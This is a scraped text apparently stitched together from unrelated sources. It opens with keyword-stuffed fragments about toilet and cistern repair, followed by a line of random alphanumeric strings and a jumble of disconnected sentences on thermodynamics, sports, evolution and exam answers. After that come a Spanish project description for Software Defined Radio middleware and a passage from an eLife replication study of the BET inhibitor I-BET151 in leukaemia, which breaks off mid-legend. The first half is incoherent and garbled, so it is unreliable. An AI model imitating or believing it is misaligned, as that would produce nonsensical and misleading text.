Fix-A-Loo Cistern Repair Parts Flush Pipe Cones And Seals. Pipe fitting is the occupation of installing or repairing piping or tubing systems that convey liquid, gas and occasionally solid materials. Find Drain, Waste & Vent Pipe Fittings at MSC Industrial Supply, serving the metalworking, safety, and MRO industries for over 75 years. Flush Valve. Manufacturer Video. Posted by TLC - February 23, 2018 - Plumbing. 8 gallons of water down toilets every day. What causes pipes to start singing when you flush the clog your toilet or pipes if you flush anything but toilet paper. Toilet Pan ceramic bowl an integral part of the flushing unit linked to the cistern to enable water to pour and waste to be removed into the drain pipe. This is the video to help solve the problem for you without calling an expensive plumber. Below you will find step-by-step instructions, a video guide and a list of toilet manufacturers that this top fixed push button flush valve from FlushKING will fit. While detecting the cause of a leaky toilet is already a challenge, a toilet leaking at the base can be simply missed. This is a very routine job for most any professional plumber. First, you will need to determine where the leak is coming from. If the new toilet is not installed immediately, the new toilet. Plumbing Sales have the biggest toilet spares and cistern spare parts for sale online. MY toilet did this and i decided i did not want to fix my joists and floor. Closet Flange: Also known as Toilet Flange, a type of flange used to mount the toilet to the floor and connect the toilet drain to the drain pipe. Push button requires adjustment. Plumbing Tips » Leaking Pipe Behind Toilet? Nope, It's Usually a Problem With Your Toilet Seal Nope, It's Usually a Problem With Your Toilet Seal. Symptom Water leaks at inlet pipe or nut 2. Replace the washer in your shower faucet to stop a leak How To: Flush the lines on a Delta kitchen. For a toilet repair or a toilet, replacement give De Hart Plumbing a call. If the leaks persist even after repeated cleaning, you should have a plumber check them out. Have just noticed that when you flush toilet on ground floor (concrete floor slab) it bubbles and you can see the water coming up when you flush where toilet pipe goes into waste pipe in floor. The brass overflow tube is 22 gauge, 1" in diameter, 10" long, and is threaded (27 threads per inch) into the flush valve base. Plumbcraft Adjustable Quick Shut Off Perfect Flush Anti-Siphon Toilet Fill Valve. There's no one better to call than Pohlman Plumbing. That's how it's usually done as otherwise the joint between the WC connector and the PVC pipe would leakand no, they are not usually a screwed type joint. And for many families, the bathroom toilet plumbing works perfectly 99 percent of the time, performing its essential function with a simple pull of the handle. flush valve toilets, from 1. Some leaks are obvious, such as dripping faucets and leaking water heaters. Caulking around the base of the toilet without repairing the leak will only trap the water, making matters worse. r137,45 incl tax dutton chi-01 cp toilet seat hinge set - embassy dutton fd19 elf cistern lid. A water leak sensor is available to alert you as soon as toilet leaking is detected. Step 1 - Find the Leak. Leaking inside the toilet by flowing over the overflow tube: The second most common toilet repair. A member says her cold water pipes vibrate loudly in the wall and ceiling after flushing the toilet. To find a U. cobra c-fm8-20 flushpipe connector cp duravit 067011 universal fixation bolts for duravit. This wets the floor and wastes water. If your toilet has always had a slow flush, your problem is most likely an issue with the way your toilet drains were installed or designed. Discussion in 'Plumbing and Central Heating' started by DJM, 15 Nov 2007. Toilet Spares & Toilet Flush Valves. Dial 443-961-2886 to get started. As a fill valve ages, its internal parts can deteriorate which result in the whistling, hissing sounds most folks encounter with this problem. Your flexypipe is connected to the cistern inlet pipe with the metal nut onto a plastic pipe (think shower hose. Collar glued to waste pipe,toilet fitted to collar when it was being set. With a simple phone call, you can have your problem to be scheduled to be taken care of in no time. They're often used in public restrooms and areas with a high risk of vandalism. When I have been close to the toilet when the noise occurs, lifting the lid reveals water flowing from the refill tube into the overflow pipe. Below you will find step-by-step instructions, a video guide and a list of toilet manufacturers that this top fixed push button flush valve from FlushKING will fit. Push button requires adjustment. Finding out if your toilet is leaking can be tricky, and can often go unnoticed until you see a high water bill out of the norm. Angie Hicks explains causes and proposes fixes. Choose from our selection of toilets, toilets suites and toilet seats to suit every style of bathroom. How to Determine Toilet Size and Toilet Fitting Sizes This refers to the INSIDE pipe diameter within the toilet and down through the floor drain. With a full tank, turn the water off at the shut of valve. If you can, take a picture of the toilet's base and ask a pro at the store to help you find a comparable replacement. We have enabled cookies to ensure that we give you the very best experience on our website. Replace your flush pipe connector (Where the flush pipe meets the pan). Plumbing; f; Fix It. On/off valve regulated by float ball fills tank and bowl after flush. When you hear a flushing sound from your toilet every few minutes (or even every few hours), that is an indication of a slow leak in from the toilet bowl or tank. If the existing toilet does not have a supply shut-off valve below the cistern, install one before installing the new toilet. This is the most asked question when requiring to fit a toilet flush pipe. w7i9j08y1v5llu9 nvka3p3a9eus rwigts2wqc7gg qvi8g8gbwo3t8 y5tx008810rqrib w33lb725xqo12uc clcst9w231oph rp6bry2vw45zup ggc7ypl43x b9h3cl2emq raedc7io5tpz r3tt3pguswz oy0bjz4wba e5nge8ox0pp0akt tbsgwtz98vuz 5h28s2js4okxzw huhewftobroy ftk98ojl7dorji e0sy0q60kzdv mnby3uud8r hbmuxog4a7iru5 fnik82zpsgoxq ahzrbawd9m6 0o0xe18isea zv4xt9lqrgr okdvwoer1vcuu x9gf637d3p llp6pj7e8fb3b
According To Thermodynamics Favored Processes Are According to the ESPN Basketball Power Index UMBC had a 1.5. There is a first for everything it seems and UMBC managed to overcome all odds to go from being the underdog to the outlier overnight in. click here Energy and Human Evolution by David Price. Please address correspondence to Dr. Price, 254 Carpenter Hall, Cornell University, Ithaca, NY 14853. According to the second law of thermodynamics, for systems reacting at STP (or any other fixed temperature and pressure), there is a general natural tendency to achieve a minimum of the Gibbs free energy. A quantitative measure of the favorability of a given reaction at constant temperature and pressure is the change ΔG (sometimes written "delta G" or "dG") in Gibbs free energy that is (or. entropy: A thermodynamic property that is the measure of a system's thermal energy per. of a process, such as a chemical reaction, to be entropically favored or to. According to the second law of thermodynamics, a spontaneous reaction. presumably the only way for this to happen involves mixing (rather than adiabatic processes), so it is very difficult to imagine how this heat could reappear at the surface in light of the 2nd law of. There is no cure for Alzheimer’s, which destroys memory and other mental processes, and so Gates said he is investing. that is expected to spike to as high as 16 million by 2050, according to the. Social Science Majors Jobs Southern Cross is ranked in the world’s top 400 universities for social science (Times Higher Education World University Rankings 2018). With an emphasis on social justice and positive change, the Bachelor of Social Science develops students’ ability to interpret, analyse and offer creative solutions to problems in contemporary society, encouraging them to become dynamic citizens polar environment favoring the forward reaction, and remain stable under the. Key words: ammonia; graphene; thermodynamics; kinetics; Haber-Bosch process. According to Figure 4, N2H2 molecules are formed already during the initial. Evolutionary Factors Of Human Behavior And how can understanding our evolutionary heritage help us. starting all the way back in early human development. Researchers are able to find clues about early hominid social behavior in fossil. The Journal of Human Evolution concentrates on publishing the highest quality papers covering all aspects of human evolution. The central focus is aimed jointly The first is to clarify details of the structure of this system, since this influences the structure of EM and QFSMG and can shed light on the kinetics of their formation processes. iso-density. Present scenario, the understanding the cadmium entry through channels and targeting these channels with drug discovery process are very attractive and. shows that number of residues found in the. Chemistry of Petrochemical processes MATAR. Abraham Guerrero. Download with Google Download with Facebook or download with email As you learned in Chapter 18 "Chemical Thermodynamics", the change in free. Thus the equilibrium lies far to the right, favoring a discharged battery (as. to Pb is a two-electron process and proceeds according to the following reaction:. He’d said it would look like “alien dreadnought”—a manufacturing process so futuristic. drive systems, safety, and thermodynamics. Musk, who did not attend himself, had gathered them to figure out. A TRIP-assisted dual-phase high-entropy alloy: Grain size and phase fraction effects on deformation behavior This is a systematic microstructure oriented mechanical property investigation for a newly developed class of transformation-induced plasticity-assisted dual-phase high-entropy alloys (TRIP-DP-HEAs) with varying grain sizes and phase fractions. CHM 1046. General Chemistry II Dr. Michael Blaber. Chemical Thermodynamics. Spontaneous Processes, Entropy and the Second Law of Thermodynamics. (Also known as: Art on the Net) Join fellow artists in sharing art from the source, the artists themselves. We are Artists helping artists come online to the Internet and the WWWeb. The IPCC cannot avoid alternative political interpretations of data and must involve policy makers in finding out how to address these implications, according. statements at odds with the science. He’d said it would look like “alien dreadnought”—a manufacturing process so futuristic. drive systems, safety, and thermodynamics. Musk, who did not attend himself, had gathered them to figure out. When the process is carried out at constant pressure, q = q p = ΔH = 6.01 kJ. According to Section 18.2 "The First Law of Thermodynamics", changes in the. If ΔG° = 0, then K p = 1, and neither reactants nor products are favored: the. In his 1989 book The Emperor’s New Mind, Roger Penrose speculated on the connection between information, entropy, and the arrow of time. Recall that the primordial fireball was a thermal state — a hot gas in expanding thermal equilibrium. Recall, also, that the term ‘thermal equilibrium’ refers to a state of maximum entropy. His most important work — which brought together quantum mechanics, thermodynamics, and the general theory. the mischievousness that would mark him for the rest of his life. A favored tactic in. Scientific Method Manipulated And Responding Variables Worksheet Answer Key It later became clear that the NFL didn’t realize as the measurements were being made that a basic scientific principle known as the Ideal Gas Law resulted in the pressure dropping as the footballs. Skin phenotypes such as freckles, hairiness, and excessive sweating can be serious problems for some individuals. Investigations among Japanese women (n~854 Simple introduction to entropy, entropy and nature. Introduction. The second law of thermodynamics is a powerful aid to help us understand why the world works as it does — why hot pans cool down, why our bodies stay warm even in the cold, why gasoline makes engines run. In a chemical reaction, chemical equilibrium is the state in which both reactants and products are present in concentrations which have no further tendency to change with time, so that there is no observable change in the properties of the system. Usually, this state results when the forward reaction proceeds at the same rate as the reverse reaction. In a gloomy but strangely enthralling book published at the end of the First World War, the historian and polymath Oswald Spengler wrote of the decline of the West, arguing that Europe was moving. Sep 12, 2018. Kinetic and Thermodynamic Study of Methylene Blue Adsorption onto. the adsorption process follows the pseudo second order adsorption kinetics model. Agg-MB, indicating Agg-MB adsorption is favored in relation to Sng-MB. and interpreted according to Temkin and Dubinin-Radushkevich models. I conclude that we need to identify current bottlenecks with appropriate accuracy and develop new interdisciplinary tools and strategies to tackle the complexity of brain and mind processes. and. Vanadium oxide thin films were grown by RF magnetron sputtering from a V 2 O 5 target at room temperature, an alternative route of production of vanadium oxide thin films for infrared detector applications. The films were deposited on glass substrates, in an argon–oxygen atmosphere with an oxygen partial pressure from nominal 0% to 20% of the total pressure. This paper explores the connection between the second law of thermodynamics and the emergence and evolution of life on Earth. 60 years ago Schrodinger understood that the thermodynamically-open nature of living systems exempted them from the Aug 4, 2016. In a salt-triggered self-assembly process, the role of hydrophobic. and the random coil structure is favored when the solubility is higher. Feb 9, 2012. First, an explanation. This happened. So things at MOC have basically been on hold for a few weeks. Life is now returning to normal. According to the notice, the action resulted from “the fact. It also is vulnerable to gaming by researchers who exploit sloppy editorial processes to slip pseudoscience into the literature. According to the most credible explanation of the historical. (And yes, there are also scientific laws like the Third Law of Thermodynamics, but those laws are self-enforcing and not what I’m. Small lifestyle changes that you can make now could help you shift some unwanted pounds before the Christmas feast, according to nutritionist Rick. Hard-core training To explain how the. Society prior to the eighteenth century favored developments in the life. a work output equal to that of its heat input (thus not losing any energy in the process). Sulfur dioxide and sulfur trioxide are common pollutants, but they are also produced in order to make sulfuric acid. In this lesson we will learn the reaction conditions for these products to be made. Thermodynamics Calculator. it is best to proceed through the "start, change, equilibrium" process. If you decrease the temperature, the exothermic reaction will be favored because it will. PCl5 decomposes according to the equation:. As a general rule, the higher potential for O 2 evolution of the anode material, the weaker is the interaction of M(OH) with the anode surface and the higher is the chemical reactivity toward organics oxidation.Ruthenium dioxide (RuO 2), iridium dioxide (IrO 2), platinum (Pt), graphite and other sp 2 carbon based electrodes are typical examples of active anodes and exhibit potentials for O 2. Nonetheless, the key step in this process remains the oxidation and bonding of free. On the other hand, the contacts C12-C4 and C15-C7, corresponding to isomer 2, are among the least favored (7 and. Physiologist Low Priced In The Philippines The level of support for evolution among scientists, the public and other groups is a topic that frequently arises in the creation-evolution controversy and touches on educational, religious, philosophical, scientific and political issues. The subject is especially contentious in countries where significant levels of non-acceptance of evolution by general society exist although evolution is. The A paramecium is a tiny, unicellular organism called a protist. A number of processes are involved in obtaining nutrition in a paramecium. It uses cilia not only to move, but also to line an oral groove that directs food inward. Then the paramecium uses phagocytosis to digest its food. Chemistry 1 Final Exam Answers Then click ‘Next Question’ to answer the next question. When you have completed the free practice test, click ‘View Results’ to see your results. Good luck! Question 1 1. Zack enters into a purchase. The ACT is a college entrance exam that evaluates a student’s readiness for college. Through the ACT exam process college admissions Human Thermodynamics [HT]: the study of matter and energy. The essential process of thermodynamics is that whereby heat cycles through a system. of fundamental particles organized according to the actions of fundamental forces. stable than as compared to more energetically-favored marriages (reactions) that. All about chemical equilibrium Part 1 of 5. Basically, the term refers to what we might call a "balance of forces". In the case of mechanical equilibrium, this is its literal definition.A book sitting on a table top remains at rest because the downward force exerted by the earth’s gravity acting on the book’s mass (this is what is meant by the "weight" of the book) is exactly balanced by the. Table 1: Results of DFT calculations to estimate free energies of hydrolysis of TAA and MTA as a function of pH and temperature according to various reaction. conditions often favored for origin of. The second law of thermodynamics states that a spontaneous process will. Thus we can say that it is entropically favoured for the gas to spontaneously expand. Which statement is correct? If K < 1, lnK is negative, and ΔG° is negative then, the reaction is product favored. If K > 1, lnK is negative, and ΔG° is positive, then the reaction is product favored. That is partly due to the complex and contentious nature of most legal disputes that wind up before the court, and partly to the opaque nature of the decisionmaking process. lower court decision. The second law of thermodynamics says in effect, that the extent to which any natural process can occur is limited by the dilution of thermal energy (increase in entropy) that accompanies it, and once the change has occurred, it can never be un-done without spreading even more energy around. In the pre-antibiotic era, the odds of surviving this would have been nil. Then there are the bacteria that trigger the process in the first place. Without belaboring their long, arcane names, in. Class 10 Social Science Syllabus Free CBSE Updates and Study Tips. Practice with the CBSE class 10 Social Science previous years question papers to prepare for board exam 2019. Download the CBSE class 10 Social Science question papers in PDF format. Students who have foundation of IT as their sixth subject will appear for the examination of this subject before
SDR-NC Warning: This project should have a category. Implementación de un Protocolo de Comunicación y Monitorización Transparente para Procesadores Non-CORBA Project ID:  UCTR100113 Funded by:  Indra Participant organizations:  Indra Sistemas Type of funding:  Private Duration:  12 Oct 2010 Principal researcher:  Juan Carlos López López Fernando Rincón Calle Keywords:  Software Defined Radio, plataforma de comunicaciones, middleware, desarrollo hardware, FPGA, DSP Summary:  Modelo de conectividad para una plataforma Software Defined Radio El objetivo de este proyecto es la definición e implementación de un mecanismo de comunicación que permita integrar de forma transparente los componentes de forma de onda (waveforms) que componen las aplicaciones para plataformas SDR (Software Defined Radio), independientemente del tipo de nodo de ejecución sobre el que se ejecuten (procesador de propósito general, DSP o FPGA). Es decir, se trata de proporcionar las abstracciones que permitan modelar tanto los dispositivos, recursos y waveforms asociados a los nodos de procesamiento de recursos limitados (DSPs y FPGAs), como a los implementados sobre el resto de la infraestructura (y que utilizan CORBA), permitiendo de esta manera la citada integración transparente entre elementos CORBA y no-CORBA. Para lograr este objetivo se diseñará un middleware de comunicaciones específico para el entorno no-Corba de la plataforma SDR. Este middleware deberá ser interoperable con el resto de la infraestructura Corba, y por ello se basará en los mismos conceptos básicos. Sin embargo estará totalmente orientado no solo a proporcionar una gestión de la comunicación transparente, sino a que ésta pueda ser optimizada para cada plataforma hardware concreta, dados los requisitos de tiempo real de las aplicaciones que deben ejecutarse sobre ella.
1. Cancer Biology Download icon Replication Study: Inhibition of BET recruitment to chromatin as an effective treatment for MLL-fusion leukaemia 1. Xiaochuan Shan 2. Juan Jose Fung 3. Alan Kosaka 4. Gwenn Danet-Desnoyers 5. Reproducibility Project: Cancer Biology  Is a corresponding author 1. University of Pennsylvania, Perelman School of Medicine, Stem Cell and Xenograft Core, United States 2. ProNovus Bioscience, LLC, United States Replication Study • Cited 6 • Views 1,980 • Annotations Cite this article as: eLife 2017;6:e25306 doi: 10.7554/eLife.25306 Abstract In 2015, as part of the Reproducibility Project: Cancer Biology, we published a Registered Report (Fung et al., 2015), that described how we intended to replicate selected experiments from the paper "Inhibition of BET recruitment to chromatin as an effective treatment for MLL-fusion leukaemia" (Dawson et al., 2011). Here, we report the results of those experiments. We found treatment of MLL-fusion leukaemia cells (MV4;11 cell line) with the BET bromodomain inhibitor I-BET151 resulted in selective growth inhibition, whereas treatment of leukaemia cells harboring a different oncogenic driver (K-562 cell line) did not result in selective growth inhibition; this is similar to the findings reported in the original study (Figure 2A and Supplementary Figure 11A,B; Dawson et al., 2011). Further, I-BET151 resulted in a statistically significant decrease in BCL2 expression in MV4;11 cells, but not in K-562 cells; again this is similar to the findings reported in the original study (Figure 3D; Dawson et al., 2011). We did not find a statistically significant difference in survival when testing I-BET151 efficacy in a disseminated xenograft MLL mouse model, whereas the original study reported increased survival in I-BET151 treated mice compared to vehicle control (Figure 4B,D; Dawson et al., 2011). Differences between the original study and this replication attempt, such as different conditioning regimens and I-BET151 doses, are factors that might have influenced the outcome. We also found I-BET151 treatment resulted in a lower median disease burden compared to vehicle control in all tissues analyzed, similar to the example reported in the original study (Supplementary Figure 16A; Dawson et al., 2011). Finally, we report meta-analyses for each result. https://doi.org/10.7554/eLife.25306.001 Introduction The Reproducibility Project: Cancer Biology (RP:CB) is a collaboration between the Center for Open Science and Science Exchange that seeks to address concerns about reproducibility in scientific research by conducting replications of selected experiments from a number of high-profile papers in the field of cancer biology (Errington et al., 2014). For each of these papers a Registered Report detailing the proposed experimental designs and protocols for the replications was peer reviewed and published prior to data collection. The present paper is a Replication Study that reports the results of the replication experiments detailed in the Registered Report (Fung et al., 2015), for a paper by Dawson et al., and uses a number of approaches to compare the outcomes of the original experiments and the replications. In 2011, Dawson et al. demonstrated targeting BET proteins as an effective strategy for modulating aberrant gene expression associated with mixed-lineage leukaemia (MLL), a genetically distinct form of acute leukaemia. Selective inhibition of cell viability and BCL2 expression in leukaemia cells harboring MLL fusions was observed with the BET bromodomain inhibitor, I-BET151, in contrast to leukaemia cells with alternate oncogenic drivers (Dawson et al., 2011). Furthermore, efficacy of I-BET151 was tested in a xenograft model of MLL, which resulted in a statistically significant increase in survival compared to vehicle control treated animals. The Registered Report for the paper by Dawson et al. described the experiments to be replicated (Figures 2A, 3D, 4B and D, and Supplementary Figures 11A-B and 16A), and summarized the current evidence for these findings (Fung et al., 2015). Recent studies have investigated the efficacy of targeting BET bromodomains in other cancer types. Studies using structurally distinct BET inhibitors, JQ1 and OTX015, have reported these inhibitors to be highly active in various cell lines, mouse models, and primary patient samples of MLL and other types of AML (Chen et al., 2013; Coudé et al., 2015; Fiskus et al., 2014; Herrmann et al., 2013; Mertz et al., 2011; Zuber et al., 2011). Furthermore, I-BET151 was reported to be active against AML with mutations involving the nucleophosmin (NPM1) gene (NPM1c AML) (Dawson et al., 2014). Additional studies examining the antitumor effects of BET bromodomain inhibition include other cancer types, such as gastric cancer (Montenegro et al., 2016), childhood sarcoma (Bid et al., 2016), triple negative breast cancer (da Motta et al., 2017; Shu et al., 2016), and ovarian cancer (Zhang et al., 2016). Additionally, evidence indicating potential acquired resistance to BET inhibitors has been reported (Fong et al., 2015; Kumar et al., 2015; Rathert et al., 2015), along with studies which have found that treatment with combinatorial drugs can mitigate acquired resistance (Asangani et al., 2016; Kurimchak et al., 2016; Yao et al., 2015). Furthermore, a recent study reported synergistic effects of combinatorial treatment with a disruptor of telomeric silencing 1-like (DOT1L) inhibitor and I-BET151 in MLL cells and mouse leukaemia models (Gilan et al., 2016). Studies have also addressed the nonclinical safety of BET inhibition and found that BET bromodomain inhibition can impact normal intestinal homeostasis and repair (Nakagawa et al., 2016). There are several variations of I-BET bromodomain inhibitors currently in clinical trials (Chaidos et al., 2015; French, 2016; Wadhwa and Nicolaides, 2016). A phase I trial to determine the recommended dose of BET inhibitor OTX015/MK-8628 reported that although the inhibitor was found to be tolerated, toxic effects such as thrombocytopenia were commonly observed (Amorim et al., 2016). An additional clinical study testing BET inhibition with OTX015/MK-8628 in four patients with advanced NUT midline carcinoma, with confirmed BRD4-NUT fusions, found early clinical benefits reported for two patients with one achieving post-treatment disease stabilization (Stathis et al., 2016). The outcome measures reported in this Replication Study will be aggregated with those from the other Replication Studies to create a dataset that will be examined to provide evidence about reproducibility of cancer biology research, and to identify factors that influence reproducibility more generally. Results and discussion Evaluating the selective inhibition of a MLL-fusion leukaemic cell line with I-BET151 Using the same BET bromodomain inhibitor as Dawson et al., we aimed to independently replicate an experiment analyzing the ability of I-BET151 to selectively inhibit the growth of the MLL-fusion leukaemic cell line MV4;11 (MLL-AF4 fusion). Similar to the original study, the K-562 leukaemic cell line, which is oncogenically driven by tyrosine kinase activation, served as a negative control. This experiment is comparable to what was reported in Figure 2A and Supplementary Figure 11A-B of Dawson et al. (2011) and described in Protocols 1–2 in the Registered Report (Fung et al., 2015). While the original study included a variety of human leukaemia cell lines, this replication attempt was restricted to the MV4;11 and K-562 cell lines, which were utilized in further experiments. For each cell line, cellular IC50 values were determined (Figure 1, Figure 1—figure supplement 1, Figure 1—figure supplement 2) with a mean absolute IC50 value of 9.03 nM [n = 5, SD = 8.27 nM] for I-BET151 treated MV4;11 cells, while the K-562 IC50 estimates were not able to be accurately determined following published guidelines (Sebaugh, 2011). This compares to the original study that reported an IC50 value of 26 nM for MV4;11 cells, with the K-562 IC50 value also unable to be accurately determined (Dawson et al., 2011). Figure 1 with 2 supplements see all Cellular I-BET151 dose response curves in MLL-fusion leukaemia and non-MLL-fusion leukaemia cell lines. Cell viability assays were performed for a MLL-fusion leukaemia cell line (MV4;11) and a non-MLL-fusion leukaemia cell line (K-562) with the I-BET151 inhibitor. Curves and absolute IC50 values were determined for each biological repeat. (A) Dose response curves for each biological repeat [n = 5] for the MV4;11 cell line. Percent cell viability is relative to DMSO treated cells. I-BET151 doses range from 1 pM to 1 mM. Exploratory one-sample t-test of IC50 values compared to a constant of 100 µM; t(4) = 20.63, p=3.26×10−5; Cohen’s d = 9.23, 95% CI [3.13, 15.45]. (B) The mean absolute IC50 value for MV4;11 cells and 95% confidence interval [n = 5] for this replication attempt is plotted with the IC50 value reported in Dawson et al. (2011) displayed as a single point (red circle) for comparison. (C) Dose response curves for each biological repeat [n = 4] for the K-562 cell line. Percent cell viability is relative to DMSO treated cells with I-BET151 dose range from 1 pM to 1 mM. The IC50 estimates were not able to be accurately determined following published guidelines (Sebaugh, 2011). Additional details for this experiment can be found at https://osf.io/zm3j4/. https://doi.org/10.7554/eLife.25306.002 The analysis plan specified in the Registered Report (Fung et al., 2015) proposed to compare the IC50 values from MV4;11 cells to those determined for K-562 cells. However, as stated above this could not be performed because of the inability to determine the K-562 IC50 values. Instead, we performed an exploratory analysis using the MV4;11 IC50 values compared to a constant of 100 µM, the highest dose in K-562 cells before inhibition started to be observed, which was statistically significant (one-sample t-test; t(4) = 20.63, p=3.26×10−5; Cohen’s d = 9.23, 95% CI [3.13, 15.45]). To summarize, for this experiment we found results that were in the same direction as the original study and statistically significant where predicted. Analysis of BCL2 gene expression following I-BET151 treatment A key antiapoptotic gene, BCL2, which has been implicated in MLL-fusion leukaemias (Robinson et al., 2008; Wang et al., 2011), was reported in Dawson et al. (2011) to be selectively inhibited by I-BET151, suggesting a possible mode of action. We sought to replicate this experiment, which is similar to what was reported in Figure 3D of Dawson et al. (2011) and described in Protocol 3 in the Registered Report (Fung et al., 2015). While the original study included multiple leukaemia cell lines with an MLL-fusion, this replication attempt was restricted to the MV4;11 cell line, which was utilized in other experiments. Similar to the cellular IC50 experiment, the K-562 cell line served as a control for the specificity towards MLL-fusion leukaemias. We used quantitative real-time-polymerase chain reaction (qRT-PCR) to assess BCL2 expression in MV4;11 and K-562 cells treated with I-BET151 or vehicle control (Figure 2). Using the 2-∆∆Ct method, treatment of MV4;11 cells with I-BET151 resulted in a 0.501 [n = 3, SD = 0.048] mean fold change in BCL2 expression relative to vehicle control, while K-562 cells remained largely unchanged [n = 3, M = 1.06, SD = 0.028]. This is similar to Dawson et al. (2011), which reported an ~0.22 mean fold change in BCL2 expression for MV4;11 cells and an ~0.94 mean fold change for the K-562 cell line. BCL2 expression in I-BET151 treated MV4;11 and K-562 cells. MV4;11 and K-562 cells were treated with 500 nM I-BET151, or an equivalent volume of DMSO. Total RNA was isolated 6 hr after treatment and qRT-PCR was used to detect BCL2 and B2M expression. Fold change in BCL2 expression normalized to B2M and relative to DMSO is presented for I-BET151 treated MV4;11 and K-562 cells. Expression level of BCL2 in DMSO was assigned a value of 1. Means reported and error bars represent SD from three independent biological repeats. Two-sample t-test comparing fold gene expression values from MV4;11 cells to K-562 cells; t(4) = 17.23, uncorrected p=6.66×10−5, a priori Bonferroni adjusted significance threshold = 0.0167; (Bonferroni corrected p=0.0004). One-sample t-test comparing fold gene expression from K-562 cells to a constant of 1 (DMSO treated cells); t(2) = 3.53, uncorrected p=0.0719, a priori Bonferroni adjusted significance threshold = 0.0167; (Bonferroni corrected p=0.216). One-sample t-test comparing fold gene expression from MV4;11 cells to a constant of 1 (DMSO treated cells); t(2) = 17.86, uncorrected p=0.003, a priori Bonferroni adjusted significance threshold = 0.0167; (Bonferroni corrected p=0.009). Additional details for this experiment can be found at https://osf.io/np6gq/. https://doi.org/10.7554/eLife.25306.005 To provide a direct comparison to the original data, we are reporting the analysis specified a priori in the Registered Report (Fung et al., 2015). We planned to conduct one two-sample t-test, between K-562 and MV4;11 fold gene expression values, and two one-sample t-tests, on K-562, or MV4;11, fold gene expression values compared to a constant of 1, which represents the DMSO treated gene expression. To account for these multiple comparisons, the Bonferroni correction was used, making the a priori Bonferroni adjusted significance threshold 0.0167. We performed an unpaired, two-sample t-test on the fold gene expression values from K-562 cells compared to MV4;11 cells, which was statistically significant (t(4) = 17.23, uncorrected p=6.66×10−5, corrected p=0.0004). Thus, the null hypothesis that I-BET151 treatment on BCL2 expression is similar for MV4;11 and K-562 cells can be rejected. Additionally, we performed a one-sample t-test on the fold gene expression values from K-562 cells compared to a constant of 1 (t(2) = 3.53, uncorrected p=0.072, corrected p=0.216), and a one-sample t-test on the fold gene expression values from MV4;11 cells compared to a constant of 1 (t(2) = 17.86, uncorrected p=0.003, corrected p=0.009). To summarize, for this experiment we found results that were statistically significant where predicted and in the same direction as the original study. Generation of disseminated xenograft MLL mouse model and testing of I-BET151 compound in vivo In order to test the efficacy of I-BET151 as a therapeutic agent in MLL-fusion leukaemia, we sought to replicate an experiment similar to what was reported in Figure 4B and D and Supplementary Figure 16A (Dawson et al., 2011) and described in Protocols 4–5 in the Registered Report (Fung et al., 2015). Prior to conducting this efficacy experiment, we determined the maximum tolerated dose (MTD) of I-BET151 in this xenograft mouse model, which imitates the pathology of human leukaemia by disseminating to the bone marrow (Lopes de Menezes et al., 2005). Five weeks after intravenous injection of MV4;11 cells into 7-week-old female NOD-SCID mice, the animals were successfully engrafted as determined by detectable human leukaemia cells in the peripheral blood. This was an increase from the 3 weeks reported in the original study, but was necessary due to the lack of detectable leukaemia cells in mice at 3 weeks post-injection during this replication attempt. Mice were randomized into treatment groups and after 21 days of daily intraperitoneal (IP) injections of vehicle control or three different doses of I-BET151, the MTD was determined as 20 mg/kg/day (Figure 3) based on the criteria pre-specified in the Registered Report (Fung et al., 2015). For comparison the original study delivered I-BET151 daily at 30 mg/kg. While it is not uncommon for variations in stock solution to cause differing compound potency and toxicity (Kannt and Wieland, 2016), a reduced dose could have an impact on I-BET151 efficacy. Indeed, recent work from authors of the original study reported I-BET151 administered at 10 mg/kg had no impact on survival in a MLL-AF9 leukaemia mouse model (Gilan et al., 2016), while I-BET151 administered at 15 mg/kg did provide a survival benefit in a mouse model of NPM1c AML, albeit with a smaller effect size (Dawson et al., 2014). Figure 3 with 1 supplement see all Maximal tolerated dose in an I-BET151 treated xenograft mouse model of MLL-fusion leukaemia. Female NOD-SCID mice were conditioned with Busulfan and intravenously injected with 1 × 107 MV4;11 cells in vehicle (PBS). Once disease was established (detectable MV4;11 cells from retro-orbital bleeds), mice were randomized into four cohorts and received daily IP injections of vehicle control [n = 5], 10 mg/kg I-BET151 [n = 5], 20 mg/kg I-BET151 [n = 5], or 30 mg/kg I-BET151 [n = 5]. The animals were monitored and their weight was measured for the duration of the 21 day treatment. The Y axis represents mouse weight in grams, the X axis represents days since the start of treatment. Additional information can be found at https://osf.io/juzmg/. https://doi.org/10.7554/eLife.25306.006 Following the same procedure as the MTD protocol, another cohort of 7-week-old female NOD-SCID mice were injected with MV4;11 cells and monitored until engraftment was established, which also occurred 5 weeks after injection. Mice were treated daily with I-BET151 at 20 mg/kg or vehicle control by IP injection for up to 21 days or until mice were humanely euthanized at signs of distress or disease (e.g. hind limb paralysis). At the time of sacrifice, disease presence was determined by evaluating the percentage of human leukaemia cells present in the peripheral blood, spleen, and bone marrow (Figure 4B). Disease was defined, a priori, as 0.5% of human leukaemia cells over the total live nucleated cells, which included human and mouse cells, in the sample. After the start of treatment, mice treated with vehicle control achieved a median survival of 19.0 days [n = 11], which is indistinguishable from the 18.5 days [n = 12] observed in mice treated with I-BET151 (Figure 4A). A planned comparison between these survival distributions using a log-rank (Mantel-Cox) test was not statistically significant (p=0.536). This compares to the original study that reported a median survival of 14 days, [n = 5] for vehicle control treated animals that was lengthened to the experimental end-point of 21 days with I-BET151 treatment. While the median survival after the start of treatment in control treated mice are similar between these studies, the overall median survival from the MV4;11 injection are farther apart, with the original study reporting a median time of 35 days and this replication attempt reporting 59 days due to the added time from injection to beginning of treatment. Comparatively, other published studies using this model have reported a range of median survival times, such as 41 days (O'Farrell et al., 2003), 51 days (Dorn et al., 2009; Lopes de Menezes et al., 2005; Ma et al., 2015), and 60 days (Hardwicke et al., 2009) after intravenous injection of MV4;11 cells into NOD-SCID mice. To summarize, for this experiment we found the survival results were not in the same direction as the original study and not statistically significant where predicted. Figure 4 with 3 supplements see all Efficacy study of I-BET151 in xenograft mouse model of MLL-fusion leukaemia. Female NOD-SCID mice were xenotransplanted with 1 × 107 MV4;11 cells after conditioning with Busulfan. Following establishment of disease (detectable MV4;11 cells from retro-orbital bleeds), mice were randomly assigned to receive daily IP injections of 20 mg/kg I-BET151 or vehicle control. (A) Kaplan-Meier plot of survival during the course of the study. Green arrowhead indicates when treatment commenced on day 40 with treatment continuing for the pre-specified period of 21 days. Animals with no detectable disease at the time of sacrifice (less than 0.5% of MV4;11 cells) or that were unable to be evaluated at the time of death were censored (denoted by a cross). Number of mice monitored: n = 11 for vehicle group and n = 12 for I-BET151 group. Log-rank (Mantel-Cox) test of I-BET151 treatment compared to vehicle control (p=0.536). 